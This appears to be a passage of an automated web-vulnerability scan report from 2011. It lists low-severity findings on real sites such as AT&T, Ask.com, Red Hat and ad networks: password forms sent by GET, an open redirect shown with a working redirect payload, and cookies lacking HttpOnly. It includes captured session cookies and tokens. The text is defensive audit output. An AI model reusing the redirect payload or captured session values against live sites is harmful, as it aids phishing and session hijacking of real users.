The response contains the following links that appear to contain session tokens:

Request

GET /cell-phone-service/packages/windows-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; 
fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%7D; __utmc=241758596; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22r%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22t%22%3A1313432484011%2C%22u%22%3A%226923670900791695274%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22l%22%3A%22Windows%C2%AE%20Packages%22%2C%22de%22%3A%7B%22su%22%3A%22Find%20great%20free%20Phone%20deals%20and%20packages%20at%20AT%26T%20that%20can%20help%20save%20you%20money%20at%20AT%26T.%20Wireless%20from%20AT%26T.%20Wireless%20from%20AT%26T.%22%2C%22ti%22%3A%22Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T%22%2C%22nw%22%3A1812%2C%22nl%22%3A185%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 103697
Expires: Mon, 15 Aug 2011 18:20:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:32 GMT
Connection: close
Set-Cookie: TLTHID=43172EBCC76B10C7CFD7C47F0B9E96D6; Path=/; Domain=.att.com


                                                                       
...[SNIP]...
<p>-->
<a href='https://sales.liveperson.net/hc/76226072/?cmd=file&amp;file=visitorWantsToChat&amp;site=76226072&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=cingular' target='chat76226072'>
   <img id='hcDynamicIcon' name='hcDynamicIcon' src='/cell-phone-service/livePerson/chat_deployment_global/cingular/images/noscript_button/reponline.gif' alt='Live Chat' border='0' />
...[SNIP]...

6. Password field submitted using GET method
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


6.1. http://www.ask.com/settings

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password fields:

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

6.2. http://xhamster.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m5
Set-Cookie: adNum=387; path=/
Vary: Accept-Encoding
Content-Length: 59237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>xHamster's Free Porn Videos</title>
<meta name="description" content="xH
...[SNIP]...
</div>
<form id='loginForm'>
<table cellpadding="0" cellspacing="0" style="display: table;">
...[SNIP]...
<td><input type='password' class='inp' name="password" id='password'></td>
...[SNIP]...

7. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://streamate.doublepimp.com
Path:   /r.poptracking

Issue detail

The value of the qsurl request parameter is used to perform an HTTP redirect. The payload http%3a//accedad66c3140087/a%3fhttp%3a//www.xhamstercams.com/exports/golive/%3fAFNO%3d1-0-624213-344279%26UHNSMTY%3d458%26DF%3d0%26lp%3d3 was submitted in the qsurl parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /r.poptracking?pcid=e0cac655-b276-43e0-a649-96531bf856de&eventid=3&aid=20003&offerid=1363&poolid=116&publisherid=20151&siteid=20151&country=US&qsurl=http%3a//accedad66c3140087/a%3fhttp%3a//www.xhamstercams.com/exports/golive/%3fAFNO%3d1-0-624213-344279%26UHNSMTY%3d458%26DF%3d0%26lp%3d3&h=&firstdelivery=False HTTP/1.1
Host: streamate.doublepimp.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:55:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR IND"
Set-Cookie: __rtso=1363|2|8/15/2011 11:56:23 AM|42ca7cce-320c-4d84-a796-45706558fe1d; expires=Wed, 14 Sep 2011 11:55:49 GMT; path=/
Set-Cookie: __rtsv=20003_1363_116_20151_0_0_0_0_78d92430-71b3-4e6f-880c-27f86287e9ec_50.23.123.106_--_8/15/2011 11:55:49 AM_CPM_1.0000_1.0000_0; expires=Wed, 14 Sep 2011 11:55:49 GMT; path=/
Set-Cookie: __rtsp=116|2|8/15/2011 11:55:49 AM|False; expires=Wed, 14 Sep 2011 11:55:49 GMT; path=/
Location: http://accedad66c3140087/a?http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&UHNSMTY=458&DF=0&lp=3
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 244

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://accedad66c3140087/a?http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&amp;UHNSMTY=458&amp;DF=
...[SNIP]...

8. Cookie without HttpOnly flag set
There are 113 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. http://afe.specificclick.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=12915&sz=300x250&wr=j&t=j&u=http%3A%2F%2Fwww.ask.com%2Fdisplay.html%3Fcl%3Dca-aj-cat%26ch%3D%26ty%3Dimage%252Cflash%26size%3D300x250%26kw%3D%26hints%3D%26target%3D%2F5480.iac.usa.ask.hp.x.x.dir%2F%3Bsz%3D300x250%3Blog%3D0%3Bs%3Das%3Bhhi%3D159%3Btest%3D0%3Bord%3D1313432642380%3F&r=http%3A%2F%2Fwww.ask.com%2F%3Fo%3D0%26l%3Ddir&rnd=200084 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=YMP06JsA7quIjC

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=eb229dc3f898572a25f3b274e23d; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Aug 2011 18:26:47 GMT
Content-Length: 648

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=12915;c=171138;b=1014302;ts=20110815142647" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="
...[SNIP]...

8.2. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=YMP06JsA7quIjC; JSESSIONID=eafc440c2493ffe3af4cd0b47975

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=eb23298ece5b80ae456717e9cc54; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 15 Aug 2011 18:26:49 GMT
Vary: Accept-Encoding
Content-Length: 1490
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...

8.3. https://www.redhat.com/wapps/sso/login.html

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/sso/login.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435291617; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%252523nolink%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7488
Expires: Mon, 15 Aug 2011 19:09:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:09:09 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=IEriNWxEeecvJQPFhSsTOw**.4b748952; Path=/wapps/sso; Secure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>redhat
...[SNIP]...

8.4. https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/cart.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vJIBBYCtDP6oeUXM96-ZwA**.9247cfa6; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435422151; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
ETag: W/"233680-1312230722000"
Last-Modified: Mon, 01 Aug 2011 20:32:02 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 15 Aug 2011 19:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:09:26 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=vJIBBYCtDP6oeUXM96-ZwA**.9247cfa6; Path=/wapps/store; Secure
Content-Length: 233680

<html><head><script>var $gwt_version = "0.0.0";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = '985A97185B87D4EFB4466AD39FCBC09F';var $stats = $wnd.__gwtStats
...[SNIP]...

8.5. https://www.redhat.com/wapps/store/protected/purchase.html

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/store/protected/purchase.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wapps/store/protected/purchase.html HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ZMw58E0hOGt6QhgfU0v9Og**.9247cfa6; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435291617; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%252523nolink%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: https://www.redhat.com/wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 15 Aug 2011 19:07:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:07:16 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=vJIBBYCtDP6oeUXM96-ZwA**.9247cfa6; Path=/wapps/store; Secure


8.6. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=pubmaticae&adSpace=audienceselect&tagKey=1532170383&th=35348227670&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D25273%26s%3D25281&f=2&p=13688099&a=1&rnd=13695087 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a9nuJts2aFvDAJsbYI7GmZbtr3jXXDntgvTsHymjdZcwZcZafb5C1WurhOLDJMncTFeSuHrZaEIYVBqqpT06MsySZboEAE0XMGXWUbpaU4eGZbE2abr

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=avnxnXtMPm4bTgUpMCGc2YOEj2XKltO4jhQcP1arcbEyMnUn051cmZbBAfNvcFmZdqjiMyJgTWfGqCq9bwGDtKZdLIbKcvtmfyE8Q9DsroiBfET5IbIcxZdqAJZbqrDSbnQMZaoxJY; path=/; domain=.tribalfusion.com; expires=Sun, 13-Nov-2011 18:41:38 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 220
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript" language="JavaScript">\r\nvar img = new Image();\r\nimg.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTE4MzImdGw9MTU3NjgwMA==
...[SNIP]...

8.7. http://a2.mediagra.com/b.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.mediagra.com
Path:   /b.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b.php?s=13 HTTP/1.1
Host: a2.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrSyMDG0BvOT80pAfCPrWgA%3D; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 740
Date: Mon, 15 Aug 2011 19:05:49 GMT
X-Varnish: 1909287838
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascrip
...[SNIP]...

8.8. http://a5.mediagra.com/b.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a5.mediagra.com
Path:   /b.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b.php?s=13 HTTP/1.1
Host: a5.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
